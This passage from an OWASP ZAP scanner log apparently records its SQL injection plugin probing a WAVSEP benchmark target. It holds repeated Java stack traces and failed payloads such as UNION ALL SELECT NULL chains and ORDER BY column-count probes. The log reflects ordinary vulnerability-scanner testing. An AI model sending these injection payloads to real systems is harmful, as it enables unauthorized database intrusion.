org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688347 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688348 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688350 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini') ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9688351 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') ORDER BY 2444-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini') ORDER BY 2444-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9688352 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini') UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688353 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini') UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688354 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini') UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688356 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688357 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688358 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688359 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688360 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688362 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini') UNION ALL 